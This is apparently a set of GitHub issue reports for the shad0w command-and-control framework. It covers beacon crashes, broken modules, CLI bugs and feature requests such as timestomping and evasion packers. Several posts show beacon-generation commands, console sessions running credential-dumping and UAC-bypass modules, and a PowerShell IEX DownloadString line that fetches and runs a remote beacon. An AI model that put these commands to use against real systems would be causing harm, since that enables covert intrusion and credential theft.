I tried to upload a small plain text file to a beacon and while the beacon received the task and created a file in the appropriate location, the file was empty. I've tried troubleshooting but am having trouble debugging the beacon end of the connection. I tested this on a Windows 10 64bit version 20H2 system with secure/static, secure/staged, non-secure/static, non-secure staged beacon types as well as with and without beacon debug enabled but all resulted in a empty file. Any pointers on debugging the code on the distant end or help in resolving/confirming this issue would be appreciated.

A command to clean up all old, exited docker containers would be useful because shad0w creates a new one for each command. Something along the lines of a "shad0w cleanup" command which would run docker rm $(docker ps -a -q -f "ancestor=shad0w") would do wonders.

Hello,

Looks like the cli with option didn't work (some exemple) :

Hi every one
i am new in exploitions and i have some questions

i would like to test the tool
firstly i runed shad0w tool in ubuntu os and i have win10 64bit working on VM and i would like make it the target
if i run the shad0w tool in ubuntu and i took the beacon.exe genterated by
"$ shad0w beacon -p x64/windows/secure -H "my ip address of my vm "-f exe -o beacon.exe"
and i puted beacon.exe file in win vm and run it there
and if i listening
$ shad0w listen -e "my ip address of my vm "
i show me "NO Avtive beacon"
my question
my steps above is correct for generate beacons?
thank you all.

Suggest renaming the jitter (-j) variable to interval (-i).
Jitter should be a +/- percentage of the interval.
For example: beacon with an interval of 30s with a jitter of 10%.
Result: a beacon with an internal of 27s - 33s.

Place output in alphabetical order for psh -l.

shad0w(lee@test) ≫ psh -l
[i] 8 available modules

-        GetHash
-        HostRecon
-        InvokeBypassUAC
-        PowerView
-        BloodHound
-        GetSystem
-        GetComputerInfo
-        PowerUp

I'm having problems getting a response from the psh command when using provided modules.
Tried on two different Win10 machines as beacon (1909 build 18363.720 and 18363.592)

Standard ps commands are working e.g. psh -c Write-Output $PSversionTable
But when running modules I don't receive any response

shad0w(User@WINDEV2002EVAL) ≫ psh -m GetHash -c Invoke-GetHash
[i] Hosting module 'GetHash' (22216 bytes) => /KEiePaTceM
[i] Beacon (b810bd86ec9ec08516b4a609d8d85899) received task

Supplied ps1 scripts alone do work when I execute them directly on the target. I'm not sure how to debug this, so maybe someone could verify it's not a local problem.

Hi.
After successful running of generated .exe stager, its process is killed after about 5 seconds.
This is my command for generating stager(beacon).
Shad0w beacon -p x64/windows/secure/static -H 127.0.0.1 -P 8080 -f exe -o beacon11.exe

This my command fort listening in mu Ubuntu test server. i want to listen port 440.
docker run -v $(pwd):/root/shad0w/.bridge -p 440:440 -p 8080:8080 -p 43334:43334 -it shad0w listen -p 440

Please tell me how to create a exe file as stager which is not killed automatically.
Thanks.

The following screenshots show performance monitor graphs of a system with a beacon idling. The steady and linear increase in memory suggests the presence of a memory leak within the beacon code. The following screenshots were generated following Microsoft's Memleak discovery guide. I look into the code and I think this is simply a lost malloc pointer.

Allocation:

I will have to look over the code more but I think this is the source of the idle memory leak however there exists this code pattern which is also probably a source of memory leaks:

char*  b64_out   = (char*)malloc(out_len);

b64_out = base64_decode((const char*)Base64Buffer, out_len - 1, &out_len);

Ten Minute Duration Test

Process Explorer Performance Start of Test

Process Explorer Performance Middle of Test

Process Explorer Performance End of Test

Issuing the "exit" command doesn't seem to do anything. Currently, Ctrl + C seems to partly get there but errors with threading.py regarding lock.acquire() - after waiting a couple minutes to see if the shutdown process was similar to starting shad0w in terms of length, a second Ctrl + C fully exits.

Tried "exit" twice then a Ctrl + C, and once more to shutdown...

Hello

I've installed Shad0w as instructed via the Wiki on Ubuntu 20.04. Upon making a payload, beacon.exe is not found on /root/shad0w/beacon/beacon.exe and its not there.

I would like to know if I can get the beacon.exe or something

Thanks

There is a decent amount of duplicated code within the beacons source folders. This makes implementing new features as well as bug fixes much harder because the changes have to be duplicated across multiple files. In order to improve development this code should be refactored and shared between beacon types.

Hi.
I executed shad0w for first time with port number 430 .
I got this error.
Please guide me how to solve the problem.

API and how to write new modules for the C2 so that it will be extensible.
Covert exploitation
Fileless
HTTP/2 (like Merlin C2)
Shredding
Timestomping
User agent switching (like Empire, it helps in bypassing IDs and endpoint)

The migrate and binject commands don't work on idle processes.

User: lee | Computer: test | OS: Windows 10 (x64) | Secure: Yes | Ping: 1s

shad0w(lee@target) ≫ getpid
[i] Beacon (27b2499bf0f3386ba90ab1830860d292) received task
PID: 10744
Image: rundll32.exe

shad0w(lee@target) ≫ ps
[i] Beacon (27b2499bf0f3386ba90ab1830860d292) received task
PID     PPID    Arch    User                              Name
===     ====    ====    ====                              ====

0       0                                                 [System Process]
4       0                                                 System
120     4                                                 Registry
636     4                                                 smss.exe
964     744                                               csrss.exe
672     744                                               wininit.exe
676     592                                               csrss.exe
936     672                                               services.exe
5592    1188    x64     ACME-CORP\lee                     SystemSettings.exe

shad0w(lee@test) ≫ migrate -p 5592
[i] Beacon (27b2499bf0f3386ba90ab1830860d292) received task

shad0w(lee@test) ≫ getpid
[i] Beacon (27b2499bf0f3386ba90ab1830860d292) received task
PID: 10744
Image: rundll32.exe

Same results with the binject command.

Note: I tried migrating to a process that I know was active (Chrome) and it worked.

Hi,

./shad0w beacon -p x64/windows/secure/static -H mysite.com -f exe -o beacon.exe
The secure payload makes heavy use of new windows features and ntdll api hooking.
This can make the payload a lot more resistant to EDR products but can also make it more unstable.
Its been tested on:
- x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
- x64 Windows Server 2019
It may work on other systems as well.

Static payloads can be very large and much easier to detect.
For use in droppers, loaders, exploits etc staged payloads are recommended as they are much smaller, so easier to use.

ERROR: building module
Traceback (most recent call last):
File "./shad0w.py", line 182, in
shad0w.build()
File "./shad0w.py", line 113, in build
length = payload_format.create(self)
File "/root/shad0w/lib/payload_format.py", line 76, in create
return format_exe(builder)
File "/root/shad0w/lib/payload_format.py", line 30, in format_exe
with open("/root/shad0w/beacon/beacon.exe", 'rb') as file:
FileNotFoundError: [Errno 2] No such file or directory: '/root/shad0w/beacon/beacon.exe'

Steps to reproduce:

• Interact with an active beacon
• Enter: execute -> A error message is displayed
• Enter execute again -> The message is shown two times
• Enter a valid command -> The error_list variable is not cleared which leads to the same error messages as before

Example:

shad0w(az500@c2test) ≫ execute
the following arguments are required: -f/--file
...

shad0w(az500@c2test) ≫ execute
the following arguments are required: -f/--file
the following arguments are required: -f/--file
...

shad0w(az500@c2test) ≫ execute -f msg.exe -p hello world
the following arguments are required: -f/--file
the following arguments are required: -f/--file

I noticed this in the following commands:

• execute
• shinject
• rubeus
• hijack
• dllinject
• binject

Seems to work without this issue: (Not sure yet why this behaves different)

• mimikatz

Hi.
i executed shad0w for first time. so, port number 80 is always in use.
can i change port number to other numbers, such as 443, 8080 or ...?
please guide me on how to do it.
thanks.

Working:

• rubeus
• seatbelt

Broken:

• safetykatz
• sharpchrome
• sharpdpapi
• sharpdump
• sharpup
• sharpwmi

When trying to call most of the GhostPack modules, shad0w looks in /root/shad0w/.
Suggest changing the hardcoded path to a relative path.
That way if shad0w is installed a different directory like /opt/, all of the modules should work.

The ls command is not working in directories like documents and settings

The response from the beacon is

      ERROR: Access to the path '.\*' is denied.

While testing mirror mode I found an issue when using get_base_page with htmlonly set to False.
The response tuple is in the wrong order
return req.content, headers, req.status

which leads to

File "/usr/lib/python2/dist-packages/flask/app.py", line
1952, in full_dispatch_request return self.finalize_request(rv)
File "/usr/lib/python2/dist-packages/flask/app.py", line
1967, in finalize_request response = self.make_response(rv)
File "/usr/lib/python2/dist-packages/flask/app.py", line
2108, in make_response rv = self.response_class(rv, status=status, headers=headers)
File "/usr/lib/python2/dist-packages/werkzeug/wrappers/base_response.py", line
186, in __init__ self.headers = Headers(headers)
File "/usr/lib/python2/dist-packages/werkzeug/datastructures.py", line
957, in __init__ self.extend(defaults)
File "/usr/lib/python2/dist-packages/werkzeug/datastructures.py", line
1100, in extend for key, value in iter_multi_items(args[-1]):
    File "/usr/lib/python2/dist-packages/werkzeug/datastructures.py", line
53, in iter_multi_items for item in mapping:
    TypeError: 'int' object is not iterable

This is not a severe issue since it is not used on master.
Already working on the fix

Is it possible to automate commands, upon connection, like metasploit autoRunScript?

Hello,

I'm testing the project. Good work. Very interesting.

I have generated these 2 payloads:

shad0w beacon -p x64/windows/secure/static -H IP -f raw -o payload_static.bin
shad0w beacon -p x64/windows/secure -H IP -f raw -o payload_staged.bin

I have a connection back to the C2 for these 2 payloads but after, I have the following error in the output of the payload (on the target):

Assertion failed: jso->_ref_count > 0, file json_object.c, line 192

The beacon craches on the target.

I can not stop the beacon on the C2. I can't execute Shad0w commands on the beacon.

The target is a Microsoft Windows 10 Home (10.0.19042 N/A Build 19042).

I have done a mistake somewhere ?

Best regards,

I am able to generate, execute, and receive callbacks on beacons.

However, when I try to run commands on the beacon I am receiving the below python errors in base64.py.

I followed the installation instructions from https://blog.dylan.codes/shad0w/ .

How to do shell interaction

I've just installed Shad0w and fired up the application and got a working beacon, however when I try to run any commands on the beacon I keep getting the same error :

[2021-08-18 04:48:26,683] ERROR in app: Exception on /tasks [POST]
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/flask/app.py", line 2070, in wsgi_app
response = self.full_dispatch_request()
File "/usr/local/lib/python3.9/dist-packages/flask/app.py", line 1515, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/local/lib/python3.9/dist-packages/flask/app.py", line 1513, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/local/lib/python3.9/dist-packages/flask/app.py", line 1499, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
File "/root/shad0w/lib/http_server.py", line 59, in web_task_beacon
return phandle.task_beacon(request)
File "/root/shad0w/lib/path_handler.py", line 40, in task_beacon
beacon_id, opcode, data = tools.get_data_from_json(jdata)
File "/root/shad0w/lib/tools.py", line 48, in get_data_from_json
data = base64.b64decode(data).decode()
File "/usr/lib/python3.9/base64.py", line 87, in b64decode
return binascii.a2b_base64(s)
binascii.Error: Incorrect padding

Submitting this to track when time of execution occurred. It is good for operators attribution when things occurred.

Adding this to lib/path_handler.py

Timestamping:

now = datetime.now()
date_time = now.strftime("%m/%d/%Y, %H:%M:%S")

self.shad0w.debug.log(f"Beacon ({beacon_id}) received task at {date_time}", log=True)

When issuing the ps command on a x64/windows/static beacon the beacon will immediately crash without returning any data.

Hi,
As discussed on discord
I think it would be great to have the possibility to kill all beacons at once without having to get in interaction mode with the beacons.
Something like "Kill all"
Thanks,
Emeric

When trying to call any of the PowerShell modules, shad0w looks in /root/shad0w/scripts/.

Suggest changing the hardcoded path to a relative path.
That way if shad0w is installed a different directory like /opt/, all of the modules should work.

shad0w(lee@��$�D) ≫ psh -l
[i] 8 available modules

-        GetHash
-        HostRecon
-        InvokeBypassUAC
-        PowerView
-        BloodHound
-        GetSystem
-        GetComputerInfo
-        PowerUp
shad0w(lee@��$�D) ≫ psh -m GetSystem
[i] Hosting module 'GetSystem' (26498 bytes) => /UrWAPRbCnx
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task


shad0w(lee@��$�D) ≫ psh -m GetComputerInfo
[i] Hosting module 'GetComputerInfo' (19028 bytes) => /AaLiQbMQnh
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m PowerUp
[i] Hosting module 'PowerUp' (563259 bytes) => /GQxXuACZpk
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m BloodHound
[i] Hosting module 'BloodHound' (227778 bytes) => /xjpFIVtmpB
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m PowerView
[i] Hosting module 'PowerView' (770038 bytes) => /lAJIJLKHTw
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m InvokeBypassUAC
[i] Hosting module 'InvokeBypassUAC' (407271 bytes) => /sEHXkaJciR
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m HostRecon
[i] Hosting module 'HostRecon' (23436 bytes) => /BFvVxfkcIV
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m GetHash
[i] Hosting module 'GetHash' (22216 bytes) => /NRMMlumHBV
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m zzzzz
ERROR: [Errno 2] No such file or directory: '/root/shad0w/scripts/zzzzz.ps1'

Hi all,

Can I use it with IOT devices ? If not, it would be nice if you have any other recommendation. Thank you in advance !

It seems shad0w update is broken
Only working method is to git pull and rebuild

powershell payload does not execute second stage

Fresh clone and build. Using a PowerShell beacon.

shad0w ≫ [i] Beacon: lee@��{ r (ARCH: x64, OS: Windows 10, Type: SECURE)
shad0w ≫
shad0w ≫ beacons
[i] 1 active beacon

+--------+---------+----------------------------+
| Number | Session | Last Checkin |
+--------+---------+----------------------------+
| 1 | lee@��{ r | 2021-01-05 16:10:04.137746 |
+--------+---------+----------------------------+

hey,
i run shad0w in Ubuntu system and my port 80 always is busy, because Apache2 service is active. My question about changing port number is because of this issue. The constant activation of port 80 by Apache2 processes has made it very difficult for me to use this tool. Please guide me about this issue.

Currently the shad0w cli tool doesn't understand --help for its subcommands and will only return help messages for the top level. This makes using the tool hard if you do not already know the cli arguments. Operators can "trick" the parser into printing the subcommands help message by supplying bogus cli arguments but this is not ideal. shad0w's cli component should support help messages for each of the subcommands as well as the top level help message. Below are examples of the top level help message and bogus argument workaround

Top Level Help

root@d7d7d46a8fc9:~/shad0w# ./shad0w.py listen -h                                                                                                                                                                                             
usage: shad0w.py [-h]                                                                                                                                                                                                                         
                                                                                                                                                                                                                                              
positional arguments:                                                                                                                                                                                                                         
  listen      Tell shad0w to listen for connections                                                                                                                                                                                           
  beacon      Tell shad0w to create a beacon                                                                                                                                                                                                  
  update      Update shad0w                                                                                                                                                                                                                   
                                                                                                                                                                                                                                              
optional arguments:                                                                                                                                                                                                                           
  -h, --help  show this help message and exit                                                                                                                                                                                                 
root@d7d7d46a8fc9:~/shad0w# ./shad0w.py beacon -h                                                                                                                                                                                             
usage: shad0w.py [-h]                                                                                                                                                                                                                         
                                                                                                                                                                                                                                              
positional arguments:                                                                                                                                                                                                                         
  listen      Tell shad0w to listen for connections                                                                                                                                                                                           
  beacon      Tell shad0w to create a beacon                                                                                                                                                                                                  
  update      Update shad0w                                                                                                                                                                                                                   
                                                                                                                                                                                                                                              
optional arguments:                                                                                                                                                                                                                           
  -h, --help  show this help message and exit                                                                                                                                                                                                 
root@d7d7d46a8fc9:~/shad0w# ./shad0w.py update -h                                                                                                                                                                                             
usage: shad0w.py [-h]                                                                                                                                                                                                                         
                                                                                                                                                                                                                                              
positional arguments:                                                                                                                                                                                                                         
  listen      Tell shad0w to listen for connections                                                                                                                                                                                           
  beacon      Tell shad0w to create a beacon                                                                                                                                                                                                  
  update      Update shad0w                                                                                                                                                                                                                   

optional arguments:
  -h, --help  show this help message and exit

Bogus Argument to print subcommand help

root@d7d7d46a8fc9:~/shad0w# ./shad0w.py listen --asdf                                                                   
usage: listen [-h] [-a ADDRESS] [-p PORT] [-k KEY] [-c CERT] [-m MIRROR] [-d] [-e ENDPOINT]
listen: error: unrecognized arguments: --asdf

Add a way to get back to the console after interacting with a session. Similar to "background" with metasploit or "back" with empire.

┌──(samalliot㉿ziuat-warlock)-[~]
└─$ sudo shad0w listen -e 172.18.32.56
[sudo] password for samalliot:
Unable to find image 'shad0w:latest' locally
docker: Error response from daemon: pull access denied for shad0w, repository does not exist or may require 'docker login': denied: requested access to the resource is denied.
See 'docker run --help'.

Hello, I got the following error when installing shad0w using sudo ./shad0w install, I am sure that my vps has python3 and wget installed, how can I solve this problem.

Hi, I have followed the directions as provided here: https://labs.jumpsec.com/2020/06/03/shad0w/
Upon downloading+executing the .ps1 script, a process ID is printed and then Powershell crashes. No outbound traffic can be observed in Wireshark.

I created the beacon with:
shad0w beacon -p x64/windows/secure/static -H 192.168.10.135 -f psh -o beacon.ps1
And run it on the Windows 10 x64 target with:
IEX (New-Object System.Net.WebClient).DownloadString("https://another.redirector/beacon.ps1")
The download and execution is successful, then what appears to be a process ID is printed, then Powershell immediately crashes.
Monitoring on Wireshark, I see no outoing traffic to the relevant IP

I have also tried several other options incl the staged + secure .exe, staged + nonsecure .exe, and static + nonsecure ps1

I am also observing this behavior on the Detection Lab environment

Am I making a mistake somewhere here?
Thanks for your time and contributions

Hi there! Awesome project, well done team.
Does shad0w support unix environments? If not do you know any similar project to work on unix?
Cheers!

ImpersonateUser/rev2self and SMB Pivoting

If you add those couple of things, your C2 will be gold in addition to the teamserver you are already building.
Also visualization of pivots would be also a nice addition. :)
Not sure if you can do the impersonation, i assume you can if you have privileges to inject on different process but it wont be possible to rev2self i assume right?
Awesome work till now man. I will start testing it around.

P.S Mark as enhancement.

I had previous access to this target by using a PowerShell beacon.
The attack VM has been rebooted, while the target has not.

shad0w ≫ [i] Beacon: lee@��x� (ARCH: x64, OS: Windows 10, Type: SECURE)
shad0w ≫
shad0w ≫ beacons
[i] 1 active beacon

+--------+---------+----------------------------+
| Number | Session | Last Checkin |
+--------+---------+----------------------------+
| 1 | lee@��x� | 2021-01-05 19:22:35.467006 |
+--------+---------+----------------------------+
shad0w ≫ beacons -i 1

Unhandled exception in event loop:
File "/usr/lib/python3.8/asyncio/events.py", line 81, in _run
self._context.run(self._callback, *self._args)
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/eventloop/utils.py", line 77, in schedule
func()
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/application/application.py", line 469, in redraw
self._redraw()
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/application/application.py", line 536, in _redraw
self.context.run(run_in_context)
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/application/application.py", line 522, in run_in_context
self.renderer.render(self, self.layout)
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/renderer.py", line 629, in render
layout.container.preferred_height(size.columns, size.rows).preferred,
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/containers.py", line 325, in preferred_height
dimensions = [
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/containers.py", line 326, in
c.preferred_height(width, max_available_height) for c in self._all_children
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/containers.py", line 2598, in preferred_height
return self.content.preferred_height(width, max_available_height)
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/containers.py", line 1623, in preferred_height
return self._merge_dimensions(
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/containers.py", line 1651, in _merge_dimensions
preferred = get_preferred()
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/containers.py", line 1616, in preferred_content_height
return self.content.preferred_height(
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/controls.py", line 379, in preferred_height
content = self.create_content(width, None)
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/controls.py", line 392, in create_content
fragments_with_mouse_handlers = self._get_formatted_text_cached()
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/controls.py", line 358, in _get_formatted_text_cached
return self._fragment_cache.get(
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/cache.py", line 41, in get
value = getter_func()
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/layout/controls.py", line 359, in
get_app().render_counter, lambda: to_formatted_text(self.text, self.style)
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/formatted_text/base.py", line 78, in to_formatted_text
return to_formatted_text(value(), style=style)
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/formatted_text/base.py", line 78, in to_formatted_text
return to_formatted_text(value(), style=style)
File "/root/shad0w/lib/console.py", line 62, in beacon_toolbar
return HTML(f'User: {username} | Computer: {computer} | OS: {version} | Secure: {secure} | Ping: {last_ping}')
File "/usr/local/lib/python3.8/dist-packages/prompt_toolkit/formatted_text/html.py", line 31, in init
document = minidom.parseString("%s" % (value,))
File "/usr/lib/python3.8/xml/dom/minidom.py", line 1969, in parseString
return expatbuilder.parseString(string)
File "/usr/lib/python3.8/xml/dom/expatbuilder.py", line 925, in parseString
return builder.parseString(string)
File "/usr/lib/python3.8/xml/dom/expatbuilder.py", line 223, in parseString
parser.Parse(string, True)

Exception not well-formed (invalid token): line 1, column 85

Hello,

Your project looks like good and during testing i got few problem.

Impossible to create the beacon.ps1

This is what is happening for the beacon.exe on Windows 10 x64 1703 and 1909, i think the .exe crash.

Thank you for your help :)

Additional packers to consider that maybe more opsec friendly:

• https://github.com/EgeBalci/amber
• https://github.com/phra/PEzor